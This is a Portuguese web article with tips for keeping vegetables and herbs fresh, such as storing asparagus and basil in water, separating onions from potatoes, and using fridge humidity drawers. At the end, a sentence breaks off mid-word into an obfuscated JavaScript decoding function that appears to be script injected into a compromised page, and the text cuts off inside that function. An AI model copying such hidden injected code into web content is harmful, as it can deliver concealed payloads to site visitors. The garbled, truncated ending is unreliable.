Conservar legumes e vegetais – tudo o que precisa saber
Por norma, regressamos do supermercado e guardamos todos os nossos frescos no frigorífico com medo que se estraguem, sem termos ideia do erro que estamos a cometer. Na verdade, os vegetais não são todos iguais. Têm características muito próprias, que requerem cuidados extra.
Depois de conhecer estes truques para conservar legumes e vegetais não vai querer outra coisa, acredite! Os alimentos ficam com um gostinho muito especial!
Conservar legumes e vegetais frescos durante mais tempo
Trate os espargos como se fossem flores! Junte-os num molhe, enrole um cordão em volta para ficarem juntos, depois corte os caules e coloque diretamente num copo com um bocadinho de água no fundo. Assim ficam frescos durante mais tempo. E dá um toque verde à sua cozinha!
Foto: tudodemusculacao
Foto: eatthinkbemerry
O manjericão adora ambientes quentes, por isso, a maneira certa de os conservar é exatamente a mesma que a dos espargos, mas com um cuidado extra: pegue num saco transparente isotérmico, daqueles que servem para guardar coisas no frigorífico, e coloque em volta do copo, cobrindo os raminhos de manjericão, formando uma espécie de estufa.
Foto: theroyalbudha
Foto: blogspot
Sabia que o tomate se dá melhor em ambientes arejados? Tente deixá-los ao ar livre, num local onde não estejam amontoados com outros vegetais.
Foto: pixabay
O pepino e as cebolas, devem ficar na BANCADA da cozinha e não no frigorífico. Prefira os recipientes de madeira, que mantêm a humidade afastada ou então de cortiça, que são anti-bacterianos! Sabia?
Quantas vezes guardou as cebolas juntamente com as batatas? Está errado! As cebolas fazem com que as batatas germinem, ou seja, que ganhem aqueles brotos e ramos de que não gostamos, logo devem estar separadas. Experimente colocá-las em armários distintos. Depois de abertas as cebolas deverão ser colocadas no frigorífico.
Foto: saga
Tanto o alho como as batatas conservam-se melhor no escuro, por isso, aqui vai mais um truque: coloque os alhos dentro de um saco de papel e depois guarde-os num armário escuro.
Foto: pinimg
Foto: pinimg
Quanto à salsa e aos coentros, para os manter super frescos durante 5 dias após virem do supermercado, corte os caules, coloque num copo com água no fundo e, mais uma vez, forre com um saco para ter um espécie de estufa. A diferença é que estes vão para o frigorífico depois de tapados, ao invés de ficarem na bancada.
Foto: simplyrecipes
Se tem um frigorífico com regulador de humidade, melhor ainda. Os vegetais gostam de humidade, por isso, deve colocá-los na gaveta com a humidade no máximo. No caso dos frutos, estes conservam-se melhor num local mais seco, por isso, esta gaveta no frigorífico deve ser regulada para ter o mínimo de humidade.
Foto: wisegeek
Foto: squarespace
Não junte maças e laranjas, pois as maçãs fazem com que as laranjas sequem mais rápido. Afaste estes frutos uns dos outros.
Se achou úteis estas dicas para conservar legumes e vegetais frescos durante mais tempo, saiba também como ter ervas aromáticas em casa e veja estasfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa